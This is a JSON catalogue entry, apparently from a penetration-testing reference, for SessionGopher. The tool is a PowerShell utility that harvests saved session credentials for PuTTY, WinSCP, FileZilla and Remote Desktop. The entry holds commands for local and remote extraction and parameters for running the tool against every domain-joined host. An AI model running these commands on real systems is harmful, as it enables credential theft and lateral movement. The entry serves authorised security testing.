{
"name": "SessionGopher",
"phases": [
"03. Host Enumeration"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "https://github.com/Arvanaghi/SessionGopher",
"description": "SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.",
"undetected": [],
"detected": [],
"content": "",
"commands": [
{
"id": "c3323791-0859-489e-93a8-97d64d2542f6",
"name": "Locally extract saved sessions ",
"description": "",
"tag": "",
"results": [
"CRED:PASS"
],
"cmd": ". .\\SessionGopher.ps1\nInvoke-SessionGopher -Thorough"
},
{
"id": "7a6f2bf4-d302-4bd3-9af1-80a83a6e1e51",
"name": "Remotely extract saved sessions ",
"description": "",
"tag": "",
"results": [
"CRED:PASS"
],
"cmd": "Import-Module SessionGopher.ps1;\nInvoke-SessionGopher -Target 10.10.10.10 -u domain.com\\adm-arvanaghi -p s3cr3tP@ss -o"
},
{
"id": "e21c0472-36e6-418f-8833-bfb358ad819c",
"name": "Parameter",
"description": "",
"tag": "",
"results": [],
"cmd": "-Thorough: searches all drives for PuTTY private key (.ppk), Remote Desktop Connecton (.rdp), and RSA (.sdtid) files.\n-o: outputs the data to a folder of .csv files\n-iL: provide a file with a list of hosts to run SessionGopher against, each host separated by a newline. Provide the path to the file after -iL.\n-AllDomain: SessionGopher will query Active Directory for all domain-joined systems and run against all of them.\n-Target: a specific host you want to target. Provide the target host after -Target."
}
],
"latest_commit": "2022-11-22T21:33:23Z"
}
Patrick-DE
commented
1 year ago